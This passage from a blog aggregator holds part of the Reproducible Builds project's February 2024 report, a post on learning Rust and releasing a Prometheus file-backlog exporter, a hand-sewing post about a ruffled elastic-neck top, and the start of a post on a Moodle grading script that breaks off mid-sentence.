<p><a href="https://inria.hal.science/hal-04441579v2"><em>Options Matter: Documenting and Fixing Non-Reproducible Builds in Highly-Configurable Systems</em></a> by Georges Aaron Randrianaina, Djamel Eddine Khelladi, Olivier Zendra and Mathieu Acher (<a href="https://www.inria.fr/en/inria-centre-rennes-university">Inria centre at Rennes University</a>, France):</p>
<blockquote>
<p>This paper thus proposes an approach to automatically identify configuration options causing non-reproducibility of builds. It begins by building a set of builds in order to detect non-reproducible ones through binary comparison. We then develop automated techniques that combine statistical learning with symbolic reasoning to analyze over 20,000 configuration options. Our methods are designed to both detect options causing non-reproducibility, and remedy non-reproducible configurations, two tasks that are challenging and costly to perform manually. (<a href="https://inria.hal.science/hal-04441579v2">HAL Portal</a>, <a href="https://inria.hal.science/hal-04441579/file/msr24.pdf">full PDF</a>)</p>
</blockquote>
<p><br /></p>
<h3 id="mailing-list-highlights">Mailing list highlights</h3>
<p>From <a href="https://lists.reproducible-builds.org/listinfo/rb-general/">our mailing list</a> this month:</p>
<ul>
<li>
<p>User <em>cen</em> posted a query asking “<a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003238.html">How to verify a package by rebuilding it locally on Debian</a>” which <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003240.html">received a followup from Vagrant Cascadian</a>.</p>
</li>
<li>
<p>James Addison asked “<a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003246.html">Two questions about build-path reproducibility in Debian</a>” regarding the differences in the testing performed by <a href="https://salsa.debian.org/salsa-ci-team/pipeline">Debian’s GitLab continuous integration (CI) pipeline</a> and the <a href="https://tests.reproducible-builds.org/debian/reproducible.html">Debian-specific testing performed by the Reproducible Builds project itself</a>, and followed this with a separate but related question regarding misconfigured <a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a> configurations.</p>
</li>
</ul>
<p><br /></p>
<h3 id="distribution-work">Distribution work</h3>
<p><a href="https://debian.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/debian.png#right" /></a></p>
<p>In Debian this month, 5 reviews of Debian packages were added, 22 were updated and 8 were removed this month adding to <a href="https://tests.reproducible-builds.org/debian/index_issues.html">Debian’s knowledge about identified issues</a>. A number of issue types were updated as well. <a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/bcae685e">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/a3137bef">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/6ac62ef7">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/c272b790">[…]</a> In addition, Roland Clobus posted his 23rd <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003251.html">update of the status of reproducible ISO images</a> on our mailing list. In particular, Roland helpfully summarised that “all major desktops build reproducibly with <em>bullseye</em>, <em>bookworm</em>, <em>trixie</em> and <em>sid</em> provided they are built for a second time within the same DAK run (i.e. [within] 6 hours)” and that there will likely be further work at a <a href="https://wiki.debian.org/DebianEvents/de/2024/MiniDebCampHamburg">MiniDebCamp in Hamburg</a>. Furthermore, Roland also <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003233.html">responded in-depth</a> to a query about a <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-January/003217.html">previous report</a></p>
<p><br /></p>
<p><a href="https://github.com/keszybz/fedora-repro-build"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/fedora.png#right" /></a></p>
<p><a href="https://fedoraproject.org/">Fedora</a> developer <a href="https://github.com/keszybz">Zbigniew Jędrzejewski-Szmek</a> announced a work-in-progress script called <a href="https://github.com/keszybz/fedora-repro-build"><code class="language-plaintext highlighter-rouge">fedora-repro-build</code></a> that attempts to reproduce an existing package within a <a href="https://pagure.io/koji/">koji</a> build environment. Although the <a href="https://github.com/keszybz/fedora-repro-build#readme">projects’ <code class="language-plaintext highlighter-rouge">README</code> file</a> lists a number of “fields will always or almost always vary” and there is a non-zero <a href="https://pagure.io/fedora-reproducible-builds/project/issues?tags=irreproducibility">list of other known issues</a>, this is an excellent first step towards full Fedora reproducibility.</p>
<p><br /></p>
<p><a href="https://archlinux.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/archlinux.png#right" /></a></p>
<p>Jelle van der Waa <a href="https://gitlab.archlinux.org/pacman/namcap/-/merge_requests/64">introduced a new linter rule</a> for <a href="https://archlinux.org/">Arch Linux</a> packages in order to detect cache files leftover by the <a href="https://www.sphinx-doc.org/en/master/">Sphinx documentation generator</a> which are unreproducible by nature and should not be packaged. At the time of writing, 7 packages in the Arch repository are affected by this.</p>
<p><br /></p>
<p><a href="https://www.opensuse.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/opensuse.png#right" /></a></p>
<p>Elsewhere, Bernhard M. Wiedemann posted another <a href="https://lists.opensuse.org/archives/list/factory@lists.opensuse.org/thread/I66U56F5R3TR4ZTLYGPSGWINNOLZ7XP4/">monthly update</a> for his work elsewhere in openSUSE.</p>
<p><br /></p>
<h3 id="diffoscope"><a href="https://diffoscope.org"><em>diffoscope</em></a></h3>
<p><a href="https://diffoscope.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/diffoscope.png#right" /></a></p>
<p><a href="https://diffoscope.org">diffoscope</a> is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions <code class="language-plaintext highlighter-rouge">256</code>, <code class="language-plaintext highlighter-rouge">257</code> and <code class="language-plaintext highlighter-rouge">258</code> to Debian and made the following additional changes:</p>
<ul>
<li>Use a deterministic name instead of trusting <code class="language-plaintext highlighter-rouge">gpg</code>’s –use-embedded-filenames. Many thanks to Daniel Kahn Gillmor <a href="mailto:dkg@debian.org">dkg@debian.org</a> for reporting this issue and providing feedback. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/458f7f04">…</a>][<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/18d69030">…</a>]</li>
<li>Don’t error-out with a traceback if we encounter <code class="language-plaintext highlighter-rouge">struct.unpack</code>-related errors when parsing Python <code class="language-plaintext highlighter-rouge">.pyc</code> files. (<a href="https://bugs.debian.org/1064973">#1064973</a>). [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/466523ac">…</a>]</li>
<li>Don’t try and compare <code class="language-plaintext highlighter-rouge">rdb_expected_diff</code> on non-GNU systems as <code class="language-plaintext highlighter-rouge">%p</code> formatting can vary, especially with respect to MacOS. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/c09d0a9e">…</a>]</li>
<li>Fix compatibility with <a href="https://docs.pytest.org/en/8.0.x/"><code class="language-plaintext highlighter-rouge">pytest</code></a> 8.0. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/ce04e0dd">…</a>]</li>
<li>Temporarily fix support for Python 3.11.8. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/5e6cfbf0">…</a>]</li>
<li>Use the <code class="language-plaintext highlighter-rouge">7zip</code> package (over <code class="language-plaintext highlighter-rouge">p7zip-full</code>) after a Debian package transition. (<a href="https://bugs.debian.org/1063559">#1063559</a>). [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/43ee3684">…</a>]</li>
<li>Bump the minimum <a href="https://black.readthedocs.io/en/stable/">Black source code reformatter</a> requirement to 24.1.1+. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/00418fb4">…</a>]</li>
<li>Expand an older changelog entry with a CVE reference. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/86645633">…</a>]</li>
<li>Make <code class="language-plaintext highlighter-rouge">test_zip</code> black clean. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/10c0c6fc">…</a>]</li>
</ul>
<p>In addition, James Addison contributed a patch to parse the headers from the <code class="language-plaintext highlighter-rouge">diff(1)</code> correctly [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/4648dcfa">…</a>][<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/fa73fc2b">…</a>] — thanks! And lastly, Vagrant Cascadian pushed updates in <a href="https://guix.gnu.org/">GNU Guix</a> for diffoscope to version <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=9d52585ebd4d759607eacfef31144676b08edc81">255</a>, <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=30196aec07dab8cc0f4a614b160f1857377a6a84">256</a>, and <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=16ab67182bc1e5b046caee9a2e38b71159703f34">258</a>, and updated <em>trydiffoscope</em> to <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=f45d05133472a9da13eae20ba4a676c696682c90">67.0.6</a>.</p>
<p><br /></p>
<h3 id="reprotest"><a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a></h3>
<p><a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a> is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, Vagrant Cascadian made a number of changes, including:</p>
<ul>
<li>Create a (working) proof of concept for enabling a specific number of CPUs. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/cab6270">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9d0562d">…</a>]</li>
<li>Consistently use 398 days for time variation rather than choosing randomly and update <code class="language-plaintext highlighter-rouge">README.rst</code> to match. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/86365b5">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/57ab249">…</a>]</li>
<li>Support a new <code class="language-plaintext highlighter-rouge">--vary=build_path.path</code> option. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/f94904b">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9ea2e4b">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9b0f5dc">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/94e66c4">…</a>]</li>
</ul>
<p><br /></p>
<h3 id="website-updates">Website updates</h3>
<p><a href="https://reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/website.png#right" /></a></p>
<p>There were made a number of improvements to our website this month, including:</p>
<ul>
<li>
<p>Chris Lamb:</p>
<ul>
<li>Improve the relative sizing of headers. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/3243e14b">…</a>]</li>
<li>Re-order and “punch” up the introduction and documentation on the <a href="https://reproducible-builds.org/docs/source-date-epoch/"><code class="language-plaintext highlighter-rouge">SOURCE_DATE_EPOCH</code></a> page. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/05a76405">…</a>]</li>
<li>Update <a href="https://reproducible-builds.org/docs/source-date-epoch/"><code class="language-plaintext highlighter-rouge">SOURCE_DATE_EPOCH</code></a> documentation re. <code class="language-plaintext highlighter-rouge">datetime.datetime.fromtimestamp</code>. Thanks, James Addison. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/502769f1">…</a>]</li>
<li>Add a <a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/">post about Reproducible Builds at FOSDEM 2024</a>. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/b09d3c22">…</a>]</li>
</ul>
</li>
<li>
<p>Holger Levsen:</p>
<ul>
<li>Update the <a href="https://reproducible-builds.org/projects/guix">GNU Guix</a> page to include their <a href="https://qa.guix.gnu.org/reproducible-builds">reproducibility QA page</a>. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/d33582dc">…</a>]</li>
<li>Add Sune Vuorela and Jan-Benedict Glaw to our contributors list. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/3bed935a">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/8bf556b5">…</a>]</li>
</ul>
</li>
<li>
<p>Mattia Rizzolo:</p>
<ul>
<li>Add <a href="https://www.sovereigntechfund.de/">Sovereign Tech Fund</a>’s logo to our sponsors. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/a54f6e20">…</a>]</li>
<li>Update our sponsors list. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/de187090">…</a>]</li>
</ul>
</li>
</ul>
<p><br /></p>
<h3 id="reproducibility-testing-framework">Reproducibility testing framework</h3>
<p><a href="https://tests.reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/testframework.png#right" /></a></p>
<p>The Reproducible Builds project operates a comprehensive testing framework (available at <a href="https://tests.reproducible-builds.org"><em>tests.reproducible-builds.org</em></a>) in order to check packages and other artifacts for reproducibility. In February, a number of changes were made by Holger Levsen:</p>
<ul>
<li>
<p><a href="https://debian.org/">Debian</a>-related changes:</p>
<ul>
<li>Temporarily disable upgrading/bootstrapping Debian <em>unstable</em> and <em>experimental</em> as they are currently broken. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/ef88cc3ae">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7ed553444">…</a>]</li>
<li>Use the 64-bit <code class="language-plaintext highlighter-rouge">amd64</code> kernel on all <code class="language-plaintext highlighter-rouge">i386</code> nodes; no more 686 <a href="https://en.wikipedia.org/wiki/Physical_Address_Extension">PAE</a> kernels. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/53c3c39bd">…</a>]</li>
<li>Add an <a href="https://www.erlang.org/">Erlang</a> package set. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/d29d41e3b">…</a>]</li>
</ul>
</li>
<li>
<p>Other changes:</p>
<ul>
<li>Grant Jan-Benedict Glaw shell access to the Jenkins node. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/252598e99">…</a>]</li>
<li>Enable debugging for <a href="https://www.netbsd.org/">NetBSD</a> reproducibility testing. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/091fa73f1">…</a>]</li>
<li>Use <code class="language-plaintext highlighter-rouge">/usr/bin/du --apparent-size</code> in the Jenkins shell monitor. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/fd54c037d">…</a>]</li>
<li>Revert “reproducible nodes: mark osuosl2 as down”. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/37cc03eef">…</a>]</li>
<li>Thanks again to <a href="https://www.codethink.co.uk/">Codethink</a>, for they have doubled the RAM on our <code class="language-plaintext highlighter-rouge">arm64</code> nodes. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/640c38126">…</a>]</li>
<li>Only set <code class="language-plaintext highlighter-rouge">/proc/$pid/oom_score_adj</code> to -1000 if it has not already been done. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/c99da2ef3">…</a>]</li>
<li>Add the <code class="language-plaintext highlighter-rouge">opemwrt-target-tegra</code> and <code class="language-plaintext highlighter-rouge">jtx</code> task to the list of zombie jobs. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/e3b188dff">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7fbed0735">…</a>]</li>
</ul>
</li>
</ul>
<p>Vagrant Cascadian also made the following changes:</p>
<ul>
<li>Overhaul the handling of <a href="https://www.openssh.com/">OpenSSH</a> configuration files after updating from Debian <em>bookworm</em>. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/3e58ee08c">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7d8a99cb5">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/5484a9db0">…</a>]</li>
<li>Add two new <code class="language-plaintext highlighter-rouge">armhf</code> architecture build nodes, <code class="language-plaintext highlighter-rouge">virt32z</code> and <code class="language-plaintext highlighter-rouge">virt64z</code>, and insert them into the <a href="https://munin-monitoring.org/">Munin monitoring</a>. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/8700924ae">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/2c462cc3c">…</a>] [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7feece465">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/6159ad4f9">…</a>]</li>
</ul>
<p>In addition, Alexander Couzens updated the <a href="https://openwrt.org/">OpenWrt</a> configuration in order to replace the <code class="language-plaintext highlighter-rouge">tegra</code> target with <code class="language-plaintext highlighter-rouge">mpc85xx</code> [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/b5b63be56">…</a>], Jan-Benedict Glaw updated the <a href="https://www.netbsd.org/">NetBSD</a> build script to use a separate <code class="language-plaintext highlighter-rouge">$TMPDIR</code> to mitigate out of space issues on a <a href="https://en.wikipedia.org/wiki/Tmpfs">tmpfs</a>-backed <code class="language-plaintext highlighter-rouge">/tmp</code> [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/910b83f88">…</a>] and Zheng Junjie added a link to the <a href="https://guix.gnu.org/">GNU Guix</a> tests [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/57b21155e">…</a>].</p>
<p>Lastly, node maintenance was performed by Holger Levsen [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/01ecc9495">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/2f650ed98">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/20e9e5c64">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/9ce43116c">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/9a37e768d">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/b7417a2f8">…</a>] and Vagrant Cascadian [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/a2315e19f">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/aa7579a92">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/c78087b27">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/5b9d95648">…</a>].</p>
<p><br /></p>
<h3 id="upstream-patches">Upstream patches</h3>
<p>The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:</p>
<ul>
<li>
<p>Philip Rinn:</p>
<ul>
<li><a href="https://github.com/manisandro/gImageReader/pull/667"><code class="language-plaintext highlighter-rouge">gimagereader</code></a> (date)</li>
</ul>
</li>
<li>
<p>Bernhard M. Wiedemann:</p>
<ul>
<li><a href="https://github.com/OSGeo/grass/pull/3417"><code class="language-plaintext highlighter-rouge">grass</code></a> (date-related issue)</li>
<li><a href="https://build.opensuse.org/request/show/1144993"><code class="language-plaintext highlighter-rouge">grub2</code></a> (filesystem ordering issue)</li>
<li><a href="https://build.opensuse.org/request/show/1150775"><code class="language-plaintext highlighter-rouge">latex2html</code></a> (drop a non-deterministic log)</li>
<li><a href="https://github.com/markh794/mhvtl/pull/128"><code class="language-plaintext highlighter-rouge">mhvtl</code></a> (tar)</li>
<li><a href="https://github.com/openSUSE/obs-build/issues/980"><code class="language-plaintext highlighter-rouge">obs</code></a> (build-tool issue)</li>
<li><a href="https://github.com/ollama/ollama/pull/2836"><code class="language-plaintext highlighter-rouge">ollama</code></a> (GZip embedding the modification time)</li>
<li><a href="https://github.com/mfontanini/presenterm/pull/202"><code class="language-plaintext highlighter-rouge">presenterm</code></a> (filesystem-ordering issue)</li>
<li><a href="https://bugreports.qt.io/browse/QTBUG-122722"><code class="language-plaintext highlighter-rouge">qt6-quick3d</code></a> (parallelism)</li>
</ul>
</li>
<li>
<p>Chris Lamb:</p>
<ul>
<li><a href="https://bugs.debian.org/1064506">#1064506</a> filed against <a href="https://tracker.debian.org/pkg/geophar"><code class="language-plaintext highlighter-rouge">geophar</code></a>.</li>
<li><a href="https://bugs.debian.org/1064891">#1064891</a> filed against <a href="https://tracker.debian.org/pkg/pytest-repeat"><code class="language-plaintext highlighter-rouge">pytest-repeat</code></a>.</li>
<li><a href="https://bugs.debian.org/1064892">#1064892</a> filed against <a href="https://tracker.debian.org/pkg/klepto"><code class="language-plaintext highlighter-rouge">klepto</code></a>.</li>
</ul>
</li>
<li>
<p>James Addison:</p>
<ul>
<li><a href="https://bugs.debian.org/1064519">#1064519</a> filed against <a href="https://tracker.debian.org/pkg/flask-limiter"><code class="language-plaintext highlighter-rouge">flask-limiter</code></a>.</li>
<li><a href="https://bugs.debian.org/1063542"><code class="language-plaintext highlighter-rouge">python-parsl-doc</code></a> (disable dynamic argument evaluation by Sphinx <code class="language-plaintext highlighter-rouge">autodoc</code> extension)</li>
<li><a href="https://bugs.debian.org/1064891"><code class="language-plaintext highlighter-rouge">python3-pytest-repeat</code></a> (remove <code class="language-plaintext highlighter-rouge">entry_points.txt</code> creation that varied by shell)</li>
<li><a href="https://bugs.debian.org/1064894"><code class="language-plaintext highlighter-rouge">python3-selinux</code></a> (remove packaged <code class="language-plaintext highlighter-rouge">direct_url.json</code> file that embeds build path)</li>
<li><a href="https://bugs.debian.org/1064895"><code class="language-plaintext highlighter-rouge">python3-sepolicy</code></a> (remove packaged <code class="language-plaintext highlighter-rouge">direct_url.json</code> file that embeds build path)</li>
<li><a href="https://bugs.debian.org/1064575">#1064575</a> filed against <a href="https://tracker.debian.org/pkg/pyswarms"><code class="language-plaintext highlighter-rouge">pyswarms</code></a>.</li>
<li><a href="https://bugs.debian.org/1064638">#1064638</a> filed against <a href="https://tracker.debian.org/pkg/python-x2go"><code class="language-plaintext highlighter-rouge">python-x2go</code></a>.</li>
<li><a href="https://bugs.debian.org/1064404"><code class="language-plaintext highlighter-rouge">snapd</code></a> (fix timestamp header in packaged manual-page)</li>
<li><a href="https://bugs.debian.org/1042955"><code class="language-plaintext highlighter-rouge">zzzeeksphinx</code></a> (existing RB patch forwarded and merged (with modifications))</li>
</ul>
</li>
<li>
<p>Johannes Schauer Marin Rodrigues:</p>
<ul>
<li><a href="https://bugs.debian.org/1063939">#1063939</a> filed against <a href="https://tracker.debian.org/pkg/fop"><code class="language-plaintext highlighter-rouge">fop</code></a>.</li>
</ul>
</li>
</ul>
<p><br /></p>
<hr />
<p>If you are interested in contributing to the Reproducible Builds project, please visit our <a href="https://reproducible-builds.org/contribute/"><em>Contribute</em></a> page on our website. However, you can get in touch with us via:</p>
<ul>
<li>
<p>IRC: <code class="language-plaintext highlighter-rouge">#reproducible-builds</code> on <code class="language-plaintext highlighter-rouge">irc.oftc.net</code>.</p>
</li>
<li>
<p>Twitter: <a href="https://twitter.com/ReproBuilds">@ReproBuilds</a></p>
</li>
<li>
<p>Mastodon: <a href="https://fosstodon.org/@reproducible_builds">@reproducible_builds@fosstodon.org</a></p>
</li>
<li>
<p>Mailing list: <a href="https://lists.reproducible-builds.org/listinfo/rb-general"><code class="language-plaintext highlighter-rouge">rb-general@lists.reproducible-builds.org</code></a></p>
</li>
</ul>2024-03-09T16:53:13+00:00Reproducible BuildsIustin Pop: Finally learning some Rust - hello photo-backlog-exporter!
https://k1024.org/posts/2024/2024-03-09-learning-rust-finally/
<p>After 4? 5? or so years of wanting to learn Rust, over the past 4 or
so months I finally bit the bullet and found the motivation to write
some Rust. And the subject.</p>
<p>And I was, and still am, thoroughly surprised. It’s like someone took
Haskell, simplified it to some extents, and wrote a systems language
out of it. Writing Rust after Haskell seems easy, and pleasant, and you:</p>
<ul>
<li>don’t have to care about unintended laziness which causes memory
“leaks” (stuck memory, more like).</li>
<li>don’t have to care about GC eating too much of your multi-threaded
RTS.</li>
<li>can be happy that there’s lots of activity and buzz around the language.</li>
<li>can be happy for generating very small, efficient binaries that feel
right at home on Raspberry Pi, especially not the 5.</li>
<li>are very happy that error handling is done right (Option and Result,
not like Go…)</li>
</ul>
<p>On the other hand:</p>
<ul>
<li>there are no actual monads; the <code>?</code> operator kind-of-looks-like
being in <code>do</code> blocks, but only and only for Option and Result,
sadly.</li>
<li>there’s no <a href="https://www.stackage.org">Stackage</a>, it’s like having
only Hackage available, and you can hope all packages work together
well.</li>
<li>most packaging is designed to work only against upstream/online
crates.io, so offline packaging is doable but not “native” (from
what I’ve seen).</li>
</ul>
<p>However, overall, one can clearly see there’s more movement in Rust,
and the quality of some parts of the toolchain is better (looking at
you, rust-analyzer, compared to HLS).</p>
<p>So, with that, I’ve just tagged <a href="https://github.com/iustin/photo-backlog-exporter/releases/tag/v0.1.0">photo-backlog-exporter
v0.1.0</a>. It’s
a port of a Python script that was run as a textfile collector, which
meant updates every ~15 minutes, since it was a bit slow to start,
which I then rewrote in Go (but I don’t like Go the language, plus the
GC - if I have to deal with a GC, I’d rather write Haskell), then
finally rewrote in Rust.</p>
<p>What does this do? It exports metrics for Prometheus based on the
count, age and distribution of files in a directory. These files
being, for me, the pictures I still have to sort, cull and process,
because I never have enough free time to clear out the backlog. The
script is kind of designed to work together with Corydalis, but since
it doesn’t care about file content, it can also double (easily) as
simple “file count/age exporter”.</p>
<p>And to my surprise, writing in Rust is <em>soo</em> pleasant, that the
feature list is greater than the original Python script, and -
compared to that untested script - I’ve rather easily achieved a <em>very
high</em> coverage ratio. Rust has multiple types of tests, and the
combination allows getting pretty down to details on testing:</p>
<ul>
<li>region coverage: >80%</li>
<li>function coverage: >89% (so close here!)</li>
<li>line coverage: >95%</li>
</ul>
<p>I had to combine a (large) number of testing crates to get it
expressive enough, but it was worth the effort. The last find from
yesterday, <a href="https://docs.rs/crate/assert_cmd/latest"><code>assert_cmd</code></a>, is
excellent to describe testing/assertion in Rust itself, rather than
via a separate, new DSL, like I was using <code>shelltest</code> for, in Haskell.</p>
<p>To some extent, I feel like I found the missing arrow in the
quiver. Haskell is good, quite very good for some type of workloads,
but of course not all, and Rust complements that very nicely, with
lots of overlap (as expected). Python can fill in any quick-and-dirty
scripting needed. And I just need to learn more frontend, specifically
Typescript (the language, not referring to any specific
libraries/frameworks), and I’ll be ready for AI to take over coding
😅…</p>
<p>So, for now, I’ll need to split my free time coding between all of the
above, and keep exercising my skills. But so glad to have found a
<em>good</em> new language!</p>2024-03-09T13:30:00+00:00Iustin PopValhalla's Things: Elastic Neck Top Two: MOAR Ruffles
https://blog.trueelena.org/blog/2024/03/09-elastic_neck_top_two_moar_ruffles/index.html
<article>
<section class="header">
Posted on March 9, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Asewing.html" title="All pages tagged 'craft:sewing'.">craft:sewing</a>, <a href="https://blog.trueelena.org/tags/FreeSoftWear.html" title="All pages tagged 'FreeSoftWear'.">FreeSoftWear</a>
</section>
<section>
<p><img alt="A woman wearing a white top with a wide neck with ruffles and puffy sleeves that are gathered at the cuff. The top is tucked in the trousers to gather the fullness at the waist." class="align-center" src="https://blog.trueelena.org/blog/2024/03/09-elastic_neck_top_two_moar_ruffles/jeans_and_elastic_top.jpg" style="width: 80.0%;" /></p>
<p>After making my <a href="https://blog.trueelena.org/blog/2023/07/26-elastic_neck_top/index.html">Elastic Neck Top</a>
I knew I wanted to make another one less constrained by the amount of
available fabric.</p>
<p>I had a big cut of white cotton voile, I bought some more swimsuit
elastic, and I also had a spool of n°100 sewing cotton, but then I
postponed the project for a while I was working on other things.</p>
<p>Then FOSDEM 2024 arrived, I was going to remote it, and I was working on
my <a href="https://www.scrooppatterns.com/products/augusta-stays-1775-1789">Augusta Stays</a>, but
I knew that in the middle of FOSDEM I risked getting to the stage where
I needed to leave the computer to try the stays on: not something really
compatible with the frenetic pace of a FOSDEM weekend, even one spent at
home.</p>
<p>I needed a backup project<a class="footnote-ref" href="https://blog.trueelena.org#fn1" id="fnref1"><sup>1</sup></a>, and this was perfect: I already
had everything I needed, the pattern and instructions were already on my
site (so I didn’t need to take pictures while working), and it was
mostly a lot of straight seams, perfect while watching conference
videos.</p>
<p>So, on the Friday before FOSDEM I cut all of the pieces, then spent
three quarters of FOSDEM on the stays, and when I reached the point
where I needed to stop for a fit test I started on the top.</p>
<p>Like the first one, everything was sewn by hand, and one week after I
had started everything was assembled, except for the casings for the
elastic at the neck and cuffs, which required about 10 km of sewing, and
even if it was just a running stitch it made me want to reconsider my
lifestyle choices a few times: there was really <em>no</em> reason for me not
to do just those seams by machine in a few minutes.</p>
<p>Instead I kept sewing by hand whenever I had time for it, and on the
next weekend it was ready. We had a rare day of sun during the weekend,
so I wore my thermal underwear, some other layer, a scarf around my
neck, and went outside with my SO to have a batch of pictures taken
(those in the jeans posts, and others for a post I haven’t written yet.
Have I mentioned I have a backlog?).</p>
<p>And then the top went into the wardrobe, and it will come out again when
the weather will be a bit warmer. Or maybe it will be used under the
Augusta Stays, since I don’t have a 1700 chemise yet, but that requires
actually finishing them.</p>
<p><a href="https://sewing-patterns.trueelena.org/contemporary_unisex/tops/low_waste_elastic_neck_top/index.html">The pattern for this project was already online</a>,
of course, but I’ve added a picture of the casing to the relevant
section, and everything is as usual #FreeSoftWear.</p>
<section class="footnotes footnotes-end-of-document">
<hr />
<ol>
<li id="fn1"><p>yes, I could have worked on some knitting WIP, but lately
I’m more in a sewing mood.<a class="footnote-back" href="https://blog.trueelena.org#fnref1">↩︎</a></p></li>
</ol>
</section>
</section>
</article>2024-03-09T00:00:00+00:00Elena “of Valhalla”Louis-Philippe Véronneau: Acts of active procrastination: example of a silly Python script for Moodle
https://veronneau.org/acts-of-active-procrastination-example-of-a-silly-python-script-for-moodle.html
<p>My brain is currently suffering from an overload caused by grading student
assignments.</p>
<p>In search of a somewhat productive way to procrastinate, I thought I
would share a small script I wrote sometime in 2023 to facilitate my grading
work.</p>
<p>I use Moodle for all the classes I teach and students use it to hand me out
their papers. When I'm ready to grade them, I download the ZIP archive Moodle
